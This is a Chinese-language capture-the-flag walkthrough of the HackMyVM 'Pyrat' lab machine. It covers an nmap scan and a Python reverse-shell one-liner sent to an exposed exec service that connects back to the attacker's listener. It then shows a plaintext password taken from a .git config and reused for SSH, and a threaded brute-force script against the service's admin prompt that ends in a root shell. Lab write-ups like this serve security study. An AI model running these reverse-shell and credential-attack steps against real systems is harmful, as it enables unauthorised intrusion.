[HackMyVM]靶场 Pyrat

kali:192.168.56.104

靶机:192.168.56.123        

端口扫描

# nmap 192.168.56.123    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 15:36 CST
Nmap scan report for 192.168.56.123
Host is up (0.00040s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8000/tcp open  http-alt
MAC Address: 08:00:27:B2:CD:3D (Oracle VirtualBox virtual NIC)

开启了22 8000两个端口

先看8000

尝试基础的连接

nc连上之后，经过测试发现可以执行python语句

反弹个shell

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

# nc 192.168.56.123 8000


import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",4567));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

# nc -lvnp 4567
listening on [any] 4567 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.123] 35634
bash: /root/.bashrc: Permission denied
www-data@Pyrat:~$ /usr/bin/script -qc /bin/bash /dev/null
/usr/bin/script -qc /bin/bash /dev/null
bash: /root/.bashrc: Permission denied

然后也没有suid提权

www-data@Pyrat:/tmp$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount

经过翻文件，在/opt/dev/.git/config下翻到了用户think的密码

www-data@Pyrat:/opt/dev/.git$ cat config
cat config
[core]
        repositoryformatversion = 0
        filemode = true
        bare = false
        logallrefupdates = true
[user]
        name = Jose Mario
        email = josemlwdf@github.com

[credential]
        helper = cache --timeout=3600

[credential "https://github.com"]
        username = think
        password = _TH1NKINGPirate$_

think/_TH1NKINGPirate$_

# ssh  think@192.168.56.123
think@192.168.56.123's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 System information disabled due to load higher than 1.0

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

You have mail.
Last login: Thu Jun 15 12:09:31 2023 from 192.168.204.1
think@Pyrat:~$ 

拿到user权限

邮箱有提示

think@Pyrat:/var/mail$ cat think
From root@pyrat  Thu Jun 15 09:08:55 2023
Return-Path: <root@pyrat>
X-Original-To: think@pyrat
Delivered-To: think@pyrat
Received: by pyrat.localdomain (Postfix, from userid 0)
        id 2E4312141; Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
Subject: Hello
To: <think@pyrat>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20230615090855.2E4312141@pyrat.localdomain>
Date: Thu, 15 Jun 2023 09:08:55 +0000 (UTC)
From: Dbile Admen <root@pyrat>

Hello jose, I wanted to tell you that i have installed the RAT you posted on your GitHub page, i'll test it tonight so don't be scared if you see it running. Regards, Dbile Admen

在github上面有东西

里面找到一个py脚本，不过没什么用

这里直接看wp了，给了一个爆破脚本

import socket

# Define the server's address and port
server_address = ('192.168.56.123', 8000)  # Replace with your server's address and port

def send_word(word):
 # Create a socket object
 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 try:
     # Connect to the server
     client_socket.connect(server_address)

     # Send the word to the server
     client_socket.sendall(word.encode())

     # Receive data from the server (if applicable)
     response = client_socket.recv(1024)
     response = response.decode()
     if not word in response:
      print(f"Sent: {word} | Received: {response}")

 except ConnectionRefusedError:
     print("Connection was refused. Is the server running?")

 finally:
     # Close the socket connection
     client_socket.close()

def read_wordlist_from_file(filename):
 with open(filename, 'r') as file:
     wordlist = file.readlines()
     return [word.strip() for word in wordlist]

# Path to the wordlist file
wordlist_filename = 'wordlist.txt'

# Read words from the file
words = read_wordlist_from_file(wordlist_filename)

# Iterate through the words and send each one to the server
for word in words:
 send_word(word)

def test_this(password):
 # Create a socket object
 client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 try:
     # Connect to the server
     client_socket.connect(server_address)

     # Send the word to the server
     client_socket.sendall('admin'.encode())

     # Receive data from the server (if applicable)
     response = client_socket.recv(1024)
     response = response.decode()
     if 'Password' in response:
         client_socket.sendall(password)

         response = client_socket.recv(1024)
         response = response.decode()

         if not 'Password' in response:
             print('Password:', password)

 except ConnectionRefusedError:
     print("Connection was refused. Is the server running?")

 finally:
     # Close the socket connection
     client_socket.close()

def test_creds():
 from threading import Thread
 wordlist = '/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt'    
 passwords = read_wordlist_from_file(wordlist)
 threads = []
 for password in passwords:
     thread = Thread(target=test_this, args=(password, ))
     thread.start()
     threads.append(thread)

     if len(threads) >= 30:
         for thread in threads:
             thread.join()
         threads = []

wp给了两个脚本，第二个部分就是爆破

最后爆破出来密码是september

Open a terminal or command prompt.

Run the following command to connect to the server:

 nc <server_ip> <server_port>
Replace <server_ip> with the IP address of the server where the script is running and <server_port> with the port number specified in the script (8000 in this case).

After connecting, you can interact with the script using the following commands:

Admin: To access the admin functionality, type admin and press Enter. You will be prompted to enter a password. Enter the password and press Enter. If the password is correct, you will see the message "Welcome Admin!!! Type 'shell' to begin". You can then proceed to use the shell functionality.

Shell: To access the shell functionality, type shell and press Enter. This will spawn a shell on the server, allowing you to execute commands. You can enter any valid shell command, and the output will be displayed on your nc session.

Python Interactive: To execute python commands on the server just send your python commands and it will be passed to the exec function.

Note: Make sure to replace <server_ip> with the actual IP address of the server running the script.

根据readme 的提示

nc连接之后 输入admin 再输入密码再输入shell就能拿到root

# nc 192.168.56.123 8000 
admin
Password:
september
Welcome Admin!!! Type "shell" to begin
shell 
# ls
ls
pyrat.py  root.txt  snap
# cat root.txt
cat root.txt
b***************